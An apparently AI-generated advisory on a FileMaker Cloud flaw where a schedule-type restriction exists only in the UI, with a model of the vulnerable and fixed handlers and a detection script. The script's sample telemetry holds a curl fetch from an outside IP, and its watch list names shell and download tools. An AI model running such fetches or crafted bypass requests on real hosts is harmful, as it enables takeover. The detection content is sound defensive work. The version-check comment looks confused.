CVE-2026-43680 Overview
CVE-2026-43680 is a Remote Code Execution (RCE) vulnerability in Claris FileMaker Cloud. An authenticated user with Admin Console privileges can bypass a front-end-only restriction on OS Script schedule types and execute arbitrary operating system commands on the underlying host. The flaw is classified under CWE-94 (Improper Control of Generation of Code, "Code Injection"). Claris fixed the issue in FileMaker Cloud 2.22.0.5. No public exploit is available, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities catalog.
Critical Impact
An Admin Console user can execute arbitrary OS commands on the FileMaker Cloud host, leading to full compromise of confidentiality, integrity, and availability.
Affected Products
- Claris FileMaker Cloud versions prior to 2.22.0.5
- Affected component: the Admin Console scheduling API behind the OS Script schedule feature
- Impact scope: the underlying FileMaker Cloud host operating system, reached with the privileges of the FileMaker Server service account
Discovery Timeline
- 2026-05-12 - CVE-2026-43680 published to NVD
- 2026-05-14 - Last updated in NVD database
Technical Details for CVE-2026-43680
Vulnerability Analysis
Claris FileMaker Cloud allows administrators to configure scheduled tasks through the Admin Console. One supported schedule type runs OS-level scripts on the host. Cloud deployments restrict this schedule type to prevent tenants from executing arbitrary commands on the shared infrastructure, but the restriction is applied only in the front end.
The vulnerability stems from enforcing this restriction solely in the client-side interface. An attacker holding Admin Console credentials can bypass the UI, craft requests directly to the back-end scheduling API, and submit an OS Script schedule. The server accepts the schedule without re-validating its type and executes the specified commands on the host operating system when the schedule runs.
This is the classic client-side-only enforcement failure: the UI hides an option, but the server that actually acts on the request never re-checks it. NVD classifies the outcome under CWE-94 because the attacker ends up controlling code (shell commands) that the server executes. The result is arbitrary command execution under the privileges of the FileMaker Server service account.
Root Cause
The root cause is missing server-side validation of the schedule type. The Admin Console UI hides or disables the OS Script option for cloud tenants, but the API endpoint accepts and processes the parameter without re-checking whether that type is permitted for the deployment or whether the caller is authorized to use it. Any check that exists only in the browser can be skipped by anyone who can talk to the API directly.
Attack Vector
Exploitation requires high privileges, specifically an authenticated Admin Console account, but no user interaction. The attack is network-reachable through the Admin Console API. An attacker who compromises, or is legitimately granted, admin credentials can pivot from application-level administrative access to control of the host, and on shared infrastructure potentially beyond the tenant's own boundary. See the Claris Support Article for vendor details.
No verified proof-of-concept code is publicly available. The mechanism involves submitting a crafted schedule creation request directly to the Admin Console API, specifying an OS Script type and an attacker-controlled command payload, so that the UI restriction is never consulted.
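The following is an added, illustrative model of the root cause and mechanism described above; it is not Claris's code and not a working exploit. The endpoint shape, field names, schedule-type values, status codes and the `Deployment` flag are all assumptions for the example. It places the pre-fix handler (which trusts that the UI hid `os_script`) beside a hardened handler that re-derives the permitted schedule types on the server, so the same crafted request that the vulnerable handler stores is rejected before anything reaches the host.

```python
"""Client-side-only enforcement versus server-side validation of a schedule type.

Hypothetical, simplified request handlers for illustration only; names, fields and
status codes are assumptions and do not describe Claris's actual Admin Console API.
"""
from dataclasses import dataclass
from typing import Any, Dict

# Assumed schedule types exposed by the Admin Console scheduler.
SCHEDULE_TYPES = {"backup", "filemaker_script", "os_script", "verify"}

# In a cloud deployment the UI hides os_script. The server must hide it too:
# this set is what the hardened handler consults instead of trusting the client.
CLOUD_ALLOWED_TYPES = SCHEDULE_TYPES - {"os_script"}


@dataclass(frozen=True)
class Deployment:
    is_cloud: bool  # assumed flag: True for a shared FileMaker Cloud host


@dataclass(frozen=True)
class Response:
    status: int
    body: Dict[str, Any]


# A request an attacker could send straight to the API, skipping the UI that
# would normally not offer os_script. The command is a harmless placeholder.
CRAFTED_REQUEST: Dict[str, Any] = {
    "name": "maint",
    "type": "os_script",
    "command": "id",
}


def create_schedule_vulnerable(req: Dict[str, Any], deployment: Deployment) -> Response:
    """Pre-fix behaviour: only checks that the type exists, never the context.

    The deployment argument is accepted but ignored, which is exactly the bug:
    the cloud restriction lived in the browser, not here.
    """
    stype = req.get("type")
    if stype not in SCHEDULE_TYPES:
        return Response(400, {"error": "unknown schedule type"})
    # os_script is stored and later runs on the host as the service account.
    return Response(201, {"scheduled": stype, "command": req.get("command")})


def create_schedule_hardened(req: Dict[str, Any], deployment: Deployment) -> Response:
    """Post-fix behaviour: the allowed set is computed server-side per deployment."""
    stype = req.get("type")
    allowed = CLOUD_ALLOWED_TYPES if deployment.is_cloud else SCHEDULE_TYPES
    if stype not in allowed:
        # Reject at the API regardless of what the UI offered. Returning 403 rather
        # than silently dropping the field also produces an auditable event.
        return Response(403, {"error": f"schedule type {stype!r} is not permitted here"})
    # os_script is only reachable on deployments where it is allowed; even there,
    # the command is an opaque string and must not be interpolated into a shell.
    return Response(201, {"scheduled": stype})


if __name__ == "__main__":
    cloud = Deployment(is_cloud=True)
    print("vulnerable:", create_schedule_vulnerable(CRAFTED_REQUEST, cloud))
    print("hardened:  ", create_schedule_hardened(CRAFTED_REQUEST, cloud))
```

The point of the pairing is that nothing about the request changes between the two handlers; only the server's willingness to re-derive the policy does. A rejected request on a cloud deployment is also worth logging, since a user who sends `os_script` to an API whose UI never offered it has, by definition, gone around the front end.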
Detection Methods for CVE-2026-43680
Indicators of Compromise
- Unexpected OS Script schedule entries in FileMaker Cloud Admin Console configuration
- Child processes spawned by the FileMaker Server service that are not part of normal database operations
- Outbound network connections originating from the FileMaker Cloud host shortly after schedule creation or execution events
- Admin Console API calls to schedule endpoints from unusual source IP addresses or at atypical times
Detection Strategies
- Audit Admin Console activity logs for schedule creation events where the script type is OS-level
- Compare scheduled tasks on each FileMaker Cloud host against an approved baseline
- Monitor process lineage on FileMaker hosts for shell interpreters, scripting engines, or command utilities launched by the FileMaker Server parent process
- Alert on file writes, new scheduled jobs or services, and other persistence artifacts created by the FileMaker service account outside its normal data and log directories
Monitoring Recommendations
- Enable verbose audit logging on the FileMaker Cloud Admin Console and forward logs to a centralized SIEM
- Track authentication events for Admin Console accounts and flag logins from new geolocations or devices
- Correlate schedule modification events with subsequent process execution telemetry on the host
- Review service account behavior weekly for deviations from expected database workload patterns
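The detection strategies and monitoring recommendations above combine into one correlation rule: an OS Script schedule being created through the Admin Console, followed shortly by a shell or utility spawned under the FileMaker Server process. The block below is an added example that implements that rule over constructed sample telemetry; it is not a Claris or vendor-supplied detection. The audit-log and process-log schemas, the field names, the parent process name `fmserverd` and the ten-minute window are all assumptions, so map them onto the fields your SIEM and EDR actually emit before using it.

```python
"""Correlate OS Script schedule creation with shell activity under the FileMaker parent.

Added detection example. Log schemas, field names and the parent process name are
assumptions for illustration; the sample lines below are constructed, not real data.
"""
import json
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed Admin Console audit log (JSON lines; assumed schema).
ADMIN_AUDIT_LOG = """\
{"ts": "2026-05-13T02:14:05Z", "user": "ops.admin", "src": "10.20.0.15", "event": "schedule.create", "type": "backup", "name": "nightly"}
{"ts": "2026-05-13T03:41:52Z", "user": "svc.deploy", "src": "198.51.100.77", "event": "schedule.create", "type": "os_script", "name": "maint"}
{"ts": "2026-05-13T03:42:10Z", "user": "svc.deploy", "src": "198.51.100.77", "event": "schedule.run", "name": "maint"}
"""

# Constructed host process telemetry (JSON lines; assumed schema and process names).
PROCESS_LOG = """\
{"ts": "2026-05-13T02:14:30Z", "parent": "fmserverd", "image": "fmsib", "cmdline": "fmsib backup nightly"}
{"ts": "2026-05-13T03:42:11Z", "parent": "fmserverd", "image": "/bin/sh", "cmdline": "sh -c /tmp/maint.sh"}
{"ts": "2026-05-13T03:42:12Z", "parent": "sh", "image": "/usr/bin/curl", "cmdline": "curl -s http://198.51.100.77/a"}
"""

FM_PARENT = "fmserverd"  # assumed name of the FileMaker Server parent process
SUSPICIOUS_IMAGES = {"sh", "bash", "dash", "zsh", "python", "python3", "perl", "curl", "wget", "nc"}
WINDOW = timedelta(minutes=10)  # assumed maximum gap between creation and first run


def parse_jsonl(text: str) -> List[Dict]:
    """Parse JSON lines and turn the ISO-8601 timestamp into an aware datetime."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        row = json.loads(line)
        row["ts"] = datetime.fromisoformat(row["ts"].replace("Z", "+00:00"))
        rows.append(row)
    return rows


def os_script_schedules(audit_rows: List[Dict]) -> List[Dict]:
    """Rule 1: any schedule.create whose type is os_script (should never occur on cloud)."""
    return [r for r in audit_rows
            if r.get("event") == "schedule.create" and r.get("type") == "os_script"]


def shells_under_fm(process_rows: List[Dict]) -> List[Dict]:
    """Rule 2: shell, interpreter or download utility spawned directly by the FM parent."""
    hits = []
    for p in process_rows:
        base = p["image"].rsplit("/", 1)[-1]
        if p["parent"] == FM_PARENT and base in SUSPICIOUS_IMAGES:
            hits.append(p)
    return hits


def correlate(audit_text: str, process_text: str) -> List[Dict]:
    """Join rule 1 and rule 2 inside WINDOW; each joined pair is a high-confidence alert."""
    audit = parse_jsonl(audit_text)
    procs = parse_jsonl(process_text)
    alerts = []
    for sched in os_script_schedules(audit):
        for proc in shells_under_fm(procs):
            if sched["ts"] <= proc["ts"] <= sched["ts"] + WINDOW:
                alerts.append({
                    "user": sched["user"],
                    "src": sched["src"],
                    "schedule": sched["name"],
                    "process": proc["cmdline"],
                    "lag_seconds": int((proc["ts"] - sched["ts"]).total_seconds()),
                })
    return alerts


if __name__ == "__main__":
    for alert in correlate(ADMIN_AUDIT_LOG, PROCESS_LOG):
        print(alert)
```

Rule 1 on its own is already a hard alert for a cloud tenant, because the UI is not supposed to let anyone create that schedule type; rule 2 catches execution even if the audit log was tampered with or the schedule was created before logging was enabled. The backup child in the sample (`fmsib` under `fmserverd`) shows why the parent check alone is too noisy and the image allow-list matters.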
How to Mitigate CVE-2026-43680
Immediate Actions Required
- Ensure Claris FileMaker Cloud is running version 2.22.0.5 or later; FileMaker Cloud is a Claris-hosted service, so confirm the version in the Admin Console and contact Claris support if your instance has not yet been updated
- Rotate credentials for all Admin Console accounts after patching
- Review existing scheduled tasks and remove any OS Script entries that were not authorized
- Restrict Admin Console access to a minimum set of named administrators and enforce multi-factor authentication
Patch Information
Claris released FileMaker Cloud 2.22.0.5 to address CVE-2026-43680. The fix enforces the OS Script schedule restriction server-side for cloud deployments. Refer to the Claris Support Article for upgrade instructions and release notes.
Workarounds
- Limit Admin Console privileges to trusted operators only and audit privilege assignments
- Enforce multi-factor authentication on every Admin Console account to reduce credential theft risk
- Place the Admin Console behind a restricted network segment or VPN until the patch is applied
- Monitor host-level process execution for any commands originating from the FileMaker Server service
Where you have shell access to the host, verify the installed version after patching; for a hosted FileMaker Cloud instance, confirm the version shown in the Admin Console instead.
```bash
# Verify the installed FileMaker Server version after patching
fmsadmin --version
# Expected output: 2.22.0.5 or later
```
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.